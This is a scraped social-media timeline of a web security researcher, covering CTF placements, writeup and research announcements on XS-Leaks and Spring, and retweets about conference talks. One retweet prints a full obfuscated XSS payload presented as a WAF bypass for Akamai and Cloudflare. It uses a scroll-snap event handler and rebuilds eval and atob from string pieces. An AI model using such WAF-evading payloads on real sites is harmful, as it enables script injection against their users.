Web Application Security Researcher

Joined July 2024
5 Photos and videos
Predic retweeted
UNSTOPPABLE!!!
2
8
41
3,307
Predic retweeted
Hello! We’ve just launched a new wargame site called damn vulnerable web! It consists only of web challenges, primarily designed for intermediate to advanced players rather than beginners. We hope this wargame helps more people gain deeper and broader knowledge in web hacking :) For now, we’re planning to accept only 300 users initially for open beta testing and capacity checks. Starting from this tweet, we’ll gradually increase the number of allowed sign-ups each week. Your interest and support will be a huge help to our future activities We’ll do our best to deliver even better work going forward. Thank you! Wargame site: wargame.rewritelab.org Join our Discord: discord.gg/wYAm2n4M4J
6
92
526
28,219
31 Dec 2025
SECCON 14 Quals WEB Writeup :)
31 Dec 2025
We’ve published a new article! This is a full writeup of the web challenges from the SECCON 14 Qual round. It has been written in detail so that readers can understand the core concepts and techniques even if they did not attempt the challenges themselves. We would like to express our sincere gratitude to the researchers @Predic02 , @masamunee2003 , @ElleuchX1 , and @ irogir for their hard work on this writeup. To everyone reading this, we wish you a very happy New Year 2026! We’re planning to release something new that we’ve been preparing between January and February, so please stay tuned and show lots of interest : )
2
258
30 Dec 2025
3rd in RubiyaLab ☆☆
What a fierce competition! A massive shoutout to our Top 3 for their god-tier skills: 🥇 no rev/pwn no life - Unstoppable! 🥈 Kalmarunionen - Legendary performance. 🥉 RubiyaLab - Simply brilliant. Thank you to every team who accepted the challenge. #ASISCTF
1
5
721
8 Dec 2025
This weekend, I participated in @cykorctf under the name of @ everyone and placed 6th. And my teammate succeeded in first-blood and everyone injection was successfully performed! 🩸
1
9
2,349
Predic retweeted
24 Sep 2025
We have successfully published our third research! This research focuses on diving deep into the Spring framework. Spring is an important framework used by many companies. However, since the Spring framework doesn't frequently appear in challenges, we expect many people are unfamiliar with it Through this research, we conducted an in-depth study of the Spring framework centered on case studies - what the Spring framework is and what actual bug cases have occurred. We hope it receives a lot of interest! : )
1
5
10
1,286
Predic retweeted
25 Aug 2025
We have published a new article! You can check out the research in both Korean and English versions below :) This article is not research, but a complete writeup of the web challenges from the CODEGATE 2025 final round. We have organized it in as much detail as possible so that you can understand the core concepts even without code comprehension of the challenges We will show more activities going forward. Please show us lots of interest and look forward to it! We deeply appreciate @goldleo01 and @Predic02 for their hard work in writing the writeup
1
10
16
1,836
Predic retweeted
Our Bootkitty team will announcing "A Stealthy Bootkit-Rootkit Against Modern Operating Systems" soon at USENIX WOOT25. Stay tuned for upcoming presentation. Credit: @B1ack3at, @jihoonab151, HyunA Seo, @Iranu96, @wh1te4ever, Jinho Jung, Hyungjoon Koo. usenix.org/conference/woot25…

1
13
58
13,237
Predic retweeted
Black Hat USA 2025 slides github.com/onhexgroup/Confer…
71
317
17,140
7 Aug 2025
1
4
223
29 Jul 2025
My XS-Leaks Resarch Post is uploaded! enjoy it! [KR/ENG] research.rewritelab.org/arti…
29 Jul 2025
We have successfully published our second research! This research focuses on various XSLeaks techniques through real case studies. It explains why XSLeaks are dangerous in the real world and how XSLeaks techniques can be utilized in challenges such as CTFs. This is a series research consisting of 3 parts! We hope it will attract a lot of interest :)
1
7
482
Predic retweeted
Upstream HTTP/1.1 is inherently insecure and consistently exposes millions of websites to hostile takeover. Six years after we exposed the threat of HTTP desync attacks, there's still no end in sight. On August 6, at Black Hat USA, James Kettle from PortSwigger Research will reveal new classes of desync attack that enabled him to compromise multiple CDNs and kick off the desync endgame. Follow @PortSwigger for the full reveal! More info 👇 http1mustdie.com/
13
106
13,525
17 Jul 2025
Hi busan
1
9
647
10 Jul 2025
I participated @CODEGATE_KR as a member of @rubiyalab
1
30
1,693
Predic retweeted
22 Jun 2025
Ahoy!! we got 2nd place at GPN CTF 2025! GG! @KITCTF
8
15
2,631
Predic retweeted
9 Jun 2025
I just found a WAF bypass for Akamai and Cloudflare: <address onscrollsnapchange=window['ev' 'a' (['l','b','c'][0])](window['a' 'to' (['b','c','d'][0])]('YWxlcnQob3JpZ2luKQ==')); style=overflow-y:hidden;scroll-snap-type:x><div style=scroll-snap-align:center>1337</div></address>
14
190
1,363
82,310
Predic retweeted
23 Feb 2025
1,951
4,093
50,471
3,146,363
Predic retweeted
Can’t make this up, my in-flight tv is already hacked on the way to defcon
106
637
13,203
646,658